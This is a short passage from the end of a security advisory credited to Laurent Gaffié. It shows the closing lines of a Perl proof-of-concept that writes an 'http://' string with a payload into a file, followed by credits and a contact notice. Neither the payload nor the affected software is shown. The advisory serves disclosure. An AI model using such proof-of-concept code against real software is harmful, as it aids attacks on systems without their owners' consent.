open( $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE "http://".$payload;
close($FILE);
print "$file has been created n";
=====
5)Credits
=====
laurent gaffié
laurent.gaffie{remove_this}[at]gmail[dot]com
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.